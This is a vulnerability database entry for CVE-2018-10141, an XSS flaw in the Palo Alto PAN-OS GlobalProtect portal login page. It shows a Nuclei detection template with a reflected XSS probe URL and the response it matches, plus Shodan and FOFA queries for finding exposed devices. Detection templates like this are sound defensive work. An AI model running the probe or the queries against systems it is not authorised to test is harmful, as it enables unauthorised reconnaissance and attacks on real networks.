Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting

🗓️ 12 Jun 2026 03:02:50Reported by ProjectDiscoveryType

Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting vulnerability that allows session hijacking and data thef

Reporter	Title	Published	Views	Family All 10
BDU FSTEC	The vulnerability of the login page of the GlobalProtect firewall’s web interface allows a hacker to inject arbitrary JavaScript or HTML code.	20 Nov 201800:00	–	bdu_fstec
CNVD	Palo Alto Networks PAN-OS Cross-Site Scripting Vulnerability (CNVD-2018-21185)	16 Oct 201800:00	–	cnvd
CVE	CVE-2018-10141	12 Oct 201822:00	–	cve
Cvelist	CVE-2018-10141	12 Oct 201822:00	–	cvelist
NVD	CVE-2018-10141	12 Oct 201822:29	–	nvd
OSV	CVE-2018-10141	12 Oct 201822:29	–	osv
Palo Alto Networks	Cross-Site Scripting (XSS) in GlobalProtect Portal Login Page	12 Oct 201802:35	–	paloalto
Palo Alto Networks	Cross-Site Scripting (XSS) in GlobalProtect Portal Login Page	12 Oct 201802:35	–	paloalto
Tenable Nessus	Palo Alto Networks PAN-OS < 6.1 / 7.x < 7.1 / 8.1.x < 8.1.4 Cross-Site Scripting Vulnerability (PAN-SA-2018-0014)	14 Mar 201900:00	–	nessus
Prion	Hardcoded credentials	12 Oct 201822:29	–	prion

Source	Link
security	www.security.paloaltonetworks.com/CVE-2018-10141
nvd	www.nvd.nist.gov/vuln/detail/CVE-2018-10141
github	www.github.com/ARPSyndicate/kenzer-templates
github	www.github.com/Elsfa7-110/kenzer-templates

id: CVE-2018-10141

info:
  name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.
  reference:
    - https://security.paloaltonetworks.com/CVE-2018-10141
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10141
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-10141
    cwe-id: CWE-79
    epss-score: 0.44152
    epss-percentile: 0.97629
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
  tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'var valueUser = "j";-alert(1)-"x";'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ec7cf0ace4b7f70cd7ab57b141e24603bcbf99fa1d46cedd3a2e73deafc35d52022100e525094fa55d73e4ea9f3d722707c45ab6927bded91d4f3d09d4590bd2547766:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6Medium risk

Vulners AI Score6

CVSS 24.3

CVSS 36.1

EPSS0.44152